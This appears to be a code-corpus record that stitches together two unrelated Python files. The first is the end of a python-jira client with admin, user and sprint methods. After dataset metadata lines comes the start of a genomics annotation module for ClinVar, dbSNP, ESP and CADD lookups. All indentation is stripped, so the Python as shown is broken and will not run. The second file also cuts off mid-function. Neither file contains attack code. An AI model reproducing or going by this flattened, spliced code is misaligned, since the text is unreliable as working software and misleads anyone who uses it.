# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
return True # still reindexing is considered still a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
def backup(self, filename='backup.zip'):
"""
Will call jira export to backup as zipped xml. Returning with success does not mean that the backup process finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
def delete_project(self, pid):
"""
Project can be id, project key or project name. It will return False if it fails.
"""
found = False
try:
if not str(int(pid)) == pid:
found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
url = self._options['server'] + '/secure/admin/DeleteProject.jspa'
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def create_project(self, key, name=None, assignee=None):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
'key parameter is not all uppercase alphanumeric of length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
def add_user(self, username, email, directoryId=1, password=None, fullname=None, sendEmail=False, active=True):
fullname = username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, false for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return:
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
much slower because it requires an additional requests for each sprint
:rtype: dict
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
def update_sprint(self, id, name=None, startDate=None, endDate=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
payload['startDate'] = endDate
# if state:
# payload['state']=state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
# TODO need a better way to provide all the info from the sprintreport
# incompletedIssues went to backlog but not it not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
Return the completed issues for the sprint
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
:param board_id: the board retrieving issues from
:param sprint_id: the sprint retieving issues from
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
:param id:
:return:
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
# TODO: broken, this API does not exsit anymore and we need to use
# issue.update() to perform this operaiton
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
If a sprint was completed, then have to also edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
If a sprint was not started, then have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
data = {}
data['issueKeys'] = issue_keys
url = self._get_url('sprint/%s/issues/add' %
(sprint_id), base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank' and field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
self._rank = None
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
|
bsd-2-clause
| 4,014,760,144,798,227,500
| 38.09324
| 203
| 0.59418
| false
| 4.251024
| false
| false
| false
|
poojavade/Genomics_Docker
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/gemini-0.10.0-py2.7.egg/gemini/annotations.py
|
1
|
30633
|
#!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.138.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20140303.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.wgs.integrated_phase1_v3.20101123.snps_indels_sv.sites.2012Oct12.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'cosmic': os.path.join(anno_dirname, 'hg19.cosmic.v67.20131024.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
self.sig_code_map = {'0': 'unknown',
'1': 'untested',
'2': 'non-pathogenic',
'3': 'probable-non-pathogenic',
'4': 'probable-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
if "|" not in sig_code:
try:
return self.sig_code_map[sig_code]
except KeyError:
return None
else:
sigs = set(sig_code.split('|'))
# e.g., 255|255|255
if len(sigs) == 1:
try:
return self.sig_code_map[sigs.pop()]
except KeyError:
return None
# e.g., 1|5|255
else:
return "mixed"
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_ASN \
aaf_AFR \
aaf_EUR")
def load_annos( args ):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files( args )
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile( open( anno_files[anno] ) )
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
def _get_hits(coords, annotation, parser_type):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
if parser_type == "bed":
parser = pysam.asBed()
elif parser_type == "vcf":
parser = pysam.asVCF()
elif parser_type == "tuple":
parser = pysam.asTuple()
elif parser_type is None:
parser = None
else:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_cadd_scores(var):
"""
Returns the C-raw scores & scaled scores (CADD) to predict deleterious
variants. Implemented only for SNV's
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and len(var.REF) == 1 and \
len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
# report the first overlapping ClinVar variant Most often, just one).
cosmic_ids = []
for hit in annotations_in_region(var, "cosmic", "vcf", "ucsc"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
"""
clinvar = ClinVarInfo()
# report the first overlapping ClinVar variant Most often, just one).
for hit in annotations_in_region(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
return clinvar
def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_region(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
out whther the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
aaf_EA = aaf_AA = aaf_ALL = None
maf = fetched = con = []
exome_chip = False
found = False
info_map = {}
for hit in annotations_in_region(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
